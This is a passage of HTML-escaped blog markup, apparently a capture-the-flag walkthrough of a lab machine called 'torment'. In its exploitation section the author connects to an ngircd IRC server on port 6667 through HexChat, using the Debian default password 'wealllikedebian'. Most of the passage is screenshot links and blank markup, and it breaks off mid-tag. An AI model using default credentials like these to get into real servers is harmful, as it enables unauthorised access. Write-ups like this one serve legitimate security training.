href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha_iGp5OXQLSNFKo_WJwKTN1yWvG_OiV6t724lgWNwYuis1i3Me1Rv_1ozLdJWAoMVb2F6UK29IXiEl3CLkPCoWAF-ZUo_gpq6cTjRMYszh7E82iP8ACHEisxXnFB3n0JIcfZUhaSXR27F/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;737&quot; data-original-width=&quot;738&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha_iGp5OXQLSNFKo_WJwKTN1yWvG_OiV6t724lgWNwYuis1i3Me1Rv_1ozLdJWAoMVb2F6UK29IXiEl3CLkPCoWAF-ZUo_gpq6cTjRMYszh7E82iP8ACHEisxXnFB3n0JIcfZUhaSXR27F/s16000/screenshot.25.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;ngircd&lt;/b&gt; is an IRC chat server that is listening at port 6667:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe0cDS1gt05uyUDdtdESHJj_8SfK-yRlYo-Jo2-iaojaechVoHz7xTOVpEqXwPf_MBDTWhoUjxPPGU2NF0hwg5oTr6d9n4A0q3o0gkRGp7pZ77TDEXo9VeDjd3KYTB6Bl59lzjBaNMfdmX/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;500&quot; data-original-width=&quot;891&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe0cDS1gt05uyUDdtdESHJj_8SfK-yRlYo-Jo2-iaojaechVoHz7xTOVpEqXwPf_MBDTWhoUjxPPGU2NF0hwg5oTr6d9n4A0q3o0gkRGp7pZ77TDEXo9VeDjd3KYTB6Bl59lzjBaNMfdmX/s16000/screenshot.66.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvgzq9F5FDyOAU8dWddibjblMgPIRfW0fHY-kERu1k2b8FPUxtT49wqNX4tBBo-lKNeI4bWrSJEx3wGDLMlkdRFr80CcG_kj5QT1PKoqV1etEWjHqwpg6b6foQjRFGovt4-m0Dc2IczaRi/&quot; style=&quot;clear: left; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;222&quot; data-original-width=&quot;439&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvgzq9F5FDyOAU8dWddibjblMgPIRfW0fHY-kERu1k2b8FPUxtT49wqNX4tBBo-lKNeI4bWrSJEx3wGDLMlkdRFr80CcG_kj5QT1PKoqV1etEWjHqwpg6b6foQjRFGovt4-m0Dc2IczaRi/s16000/screenshot.7.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- To access &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;ngircd&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt; we can use client&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt; HexChat&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFfnt2-U8gjVv0JiUyDxEoNNC7I-2x8yZBZWJs6eU76iuBPjFCfvJJSaTU8G4JkR8jZGisSa2-CDHCdzNnL4oqPg6TJAESPXCaaBJBR1WPfbyXMoYDwMZaBPXvPOAcAwJ_tw2W-kJLv9h/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;552&quot; data-original-width=&quot;768&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvFfnt2-U8gjVv0JiUyDxEoNNC7I-2x8yZBZWJs6eU76iuBPjFCfvJJSaTU8G4JkR8jZGisSa2-CDHCdzNnL4oqPg6TJAESPXCaaBJBR1WPfbyXMoYDwMZaBPXvPOAcAwJ_tw2W-kJLv9h/s16000/screenshot.65.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Installing &lt;b&gt;HexChat&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvYKcpjcOFQ3kSYc6-sY0tTaVVbkSU27MX2M9SrLY-Ua-f1i3ncCyDY2MrNnstqd5QCKjMAd_7G6nUt74ElIV3nLE9m711IciuzAqTKcc-X_O42xFWBTRcyjwHscJ-qa2k771KAjjrulfc/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;365&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvYKcpjcOFQ3kSYc6-sY0tTaVVbkSU27MX2M9SrLY-Ua-f1i3ncCyDY2MrNnstqd5QCKjMAd_7G6nUt74ElIV3nLE9m711IciuzAqTKcc-X_O42xFWBTRcyjwHscJ-qa2k771KAjjrulfc/s16000/screenshot.1.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ct1oZRJGf_nPZqT39S6DNVFzHw9vs9dCbnSixsflo6PLiqob7xQbbpioLBhIr7vrYN92huUhbD9SYqdS2_xK8V0i_gdiMkpUDRppXUG_JDZQcWVk0l_169msZCE5OAuAw-mkV-jJQh-n/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;633&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8ct1oZRJGf_nPZqT39S6DNVFzHw9vs9dCbnSixsflo6PLiqob7xQbbpioLBhIr7vrYN92huUhbD9SYqdS2_xK8V0i_gdiMkpUDRppXUG_JDZQcWVk0l_169msZCE5OAuAw-mkV-jJQh-n/s16000/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Launching &lt;b&gt;HexCha&lt;/b&gt;t:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgorrrZifuH3qnfjnEiS7xXPy0zeJkg3q6lSmIdhIc5FjleA3UQZa8d6da1wFoSbBTLB9y9FQK32U09wNrHgg1cq89hahNaIQdZSo14160sT_lDUxJgya99RNmJjm8ub1rhqPCZTxGJiPdN/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;52&quot; data-original-width=&quot;310&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgorrrZifuH3qnfjnEiS7xXPy0zeJkg3q6lSmIdhIc5FjleA3UQZa8d6da1wFoSbBTLB9y9FQK32U09wNrHgg1cq89hahNaIQdZSo14160sT_lDUxJgya99RNmJjm8ub1rhqPCZTxGJiPdN/s16000/screenshot.4.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Adding server&amp;nbsp;&lt;b&gt;torment&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5wr32AY6clTXkogteIxvU2peu-nGgToAEhO2-K5KzjuSol6ekEpD-BpwJil1OQsMNWzVQ0joSPfPpxUPViaoknWNNhAoz2-a36dRKui-dHdnSIxrRy423UNPzD2UhVsWct30LofoirgY/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;494&quot; data-original-width=&quot;384&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5wr32AY6clTXkogteIxvU2peu-nGgToAEhO2-K5KzjuSol6ekEpD-BpwJil1OQsMNWzVQ0joSPfPpxUPViaoknWNNhAoz2-a36dRKui-dHdnSIxrRy423UNPzD2UhVsWct30LofoirgY/s16000/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Configuring&lt;b&gt; torment &lt;/b&gt;at IP 192.168.1.24 and port 6667 (important: uncheck tab &lt;b&gt;&lt;i&gt;Accept invalid SSL certificates&lt;/i&gt;&lt;/b&gt;). Also, using default password &lt;b&gt;wealllikedebian&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://git.in-ulm.de/cbiedl/ngircd/raw/master/debian/ngircd.conf&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://git.in-ulm.de/cbiedl/ngircd/raw/master/debian/ngircd.conf&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidaccuxSwR9QwS0mZy5upPUlC1_iHQwW2J2nVRYvtQ28bLVy-8JLA3p-gXC8nJ50InhTLfFaUBZiVqdaXBu1VyPAIRaInuHFIACNRt7fm8jwSHkH90DUqEh74iwuGIeUqSmwiua-0H5S3N/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;131&quot; data-original-width=&quot;549&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidaccuxSwR9QwS0mZy5upPUlC1_iHQwW2J2nVRYvtQ28bLVy-8JLA3p-gXC8nJ50InhTLfFaUBZiVqdaXBu1VyPAIRaInuHFIACNRt7fm8jwSHkH90DUqEh74iwuGIeUqSmwiua-0H5S3N/s16000/screenshot.70.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwbBksormN5Da6P1Y6vDgn_K9TT2oFLYnmz81j-TI6cBnRLUUSsLvFpFNQjfsCP-_TrYaK_zDxQXV9Im6Nk0JS3qHaJlCV-I3JFuY3BCxZiI6uaILNv2STe6y-uIjAC-h2xIR7InN_rLs5/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;597&quot; data-original-width=&quot;462&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwbBksormN5Da6P1Y6vDgn_K9TT2oFLYnmz81j-TI6cBnRLUUSsLvFpFNQjfsCP-_TrYaK_zDxQXV9Im6Nk0JS3qHaJlCV-I3JFuY3BCxZiI6uaILNv2STe6y-uIjAC-h2xIR7InN_rLs5/s16000/screenshot.13.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Connecting to server &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;torment&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWG3jl_wUI2SCjd_faDtVvKyk9AaK_WN3j6R7GvGQXtA2kayjd8jsk8WVA36bsspttocuHobEW0uuMhKkF1xdQub1bRHDCo8NLNgSEFK5rFfvFH3xyGtbLKKQImWfqzvaHSlZYtrkOYsJ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;426&quot; data-original-width=&quot;646&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWG3jl_wUI2SCjd_faDtVvKyk9AaK_WN3j6R7GvGQXtA2kayjd8jsk8WVA36bsspttocuHobEW0uuMhKkF1xdQub1bRHDCo8NLNgSEFK5rFfvFH3xyGtbLKKQImWfqzvaHSlZYtrkOYsJ/s16000/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbz2ocCT6KBTybGyeD4IVYa1IkVBU_-f-bEQWcuK7eRI7t56wrbgOTMWx09B9xNQgplk0rH0pFAED2aT7pmwO_5HzT6-_e7-VRDFNXOZE4_8hO002cBTIduI1055tkMKdGeQTMOlJzrvuM/&quot; style=&quot;clear: left; display: inline; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;534&quot; data-original-width=&quot;786&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbz2ocCT6KBTybGyeD4IVYa1IkVBU_-f-bEQWcuK7eRI7t56wrbgOTMWx09B9xNQgplk0rH0pFAED2aT7pmwO_5HzT6-_e7-VRDFNXOZE4_8hO002cBTIduI1055tkMKdGeQTMOlJzrvuM/s16000/screenshot.15.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; 